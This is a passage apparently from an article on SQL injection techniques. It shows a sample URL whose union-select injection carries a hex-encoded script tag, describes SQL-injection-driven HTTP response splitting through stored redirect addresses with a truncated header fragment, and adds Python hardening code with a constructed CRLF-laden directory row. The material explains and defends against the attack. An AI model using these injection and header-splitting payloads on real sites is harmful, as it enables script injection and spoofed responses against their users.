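# Constructed sample: the link from the text above, with its spaces removed.
SAMPLE_LINK = ("www.victim.com/vuln_script.php?vuln_variable=1+union+select+"
               "0x3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E")
```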
SiHRS (SQL Injection HTTP Resource Splitting)
This technique implements HTTP Resource Splitting through a script's SQL Injection vulnerability. It becomes possible if the script, for example by index, first fetches an HTTP address from the SQL database and then generates its own HTTP headers, substituting the address received from the database into the "Location:" field. This is often used in web site directories. We can give an example of an HTTP header that can be used for SiHRS in hexadecimal form.
Select HEX Code ('i.php'
Content-Length: 0
HTTP/1.1 200 OK
Content-Ty
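Hardening for the redirect pattern described above, as an added example that is not code from the original article: the stored address is validated before it reaches the "Location:" header. The helper names and the two sample directory rows are constructed for the example.

```python
"""Hardening for the SiHRS scenario above, where a script looks up a URL in
the database and copies it into the Location header of its own response.
Added example, not code from the original article: a stored value containing
CR or LF ends the header block early and lets the rest of the value be read as
a second response, so the redirect builder rejects such values (and anything
that is not an absolute http/https URL) before they reach the header."""
from urllib.parse import urlsplit


class UnsafeRedirect(ValueError):
    pass


def validate_redirect_target(url: str) -> str:
    """Return url if it is a clean absolute http(s) URL, else raise UnsafeRedirect."""
    if any(ch in url for ch in "\r\n\0"):
        raise UnsafeRedirect("control characters in redirect target")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise UnsafeRedirect("redirect target must be an absolute http(s) URL")
    return url


def is_safe_target(url: str) -> bool:
    """Boolean form of the check, for filtering rows before they are used."""
    try:
        validate_redirect_target(url)
        return True
    except UnsafeRedirect:
        return False


def naive_redirect(url: str) -> bytes:
    """The pattern described above: the stored value is pasted in unchecked."""
    return f"HTTP/1.1 302 Found\r\nLocation: {url}\r\n\r\n".encode()


def build_redirect(url: str) -> bytes:
    """Serialised 302 response; only validated targets reach the header."""
    target = validate_redirect_target(url)
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\nConnection: close\r\n\r\n").encode()


def count_responses(raw: bytes) -> int:
    """How many status lines a downstream proxy would see in these bytes."""
    return raw.count(b"HTTP/1.1 ")


# Constructed directory rows: a clean one and one carrying CRLF plus a second response.
GOOD_ROW = "http://example.org/i.php"
BAD_ROW = "http://example.org/i.php\r\nContent-Length: 0\r\n\r\nHTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
```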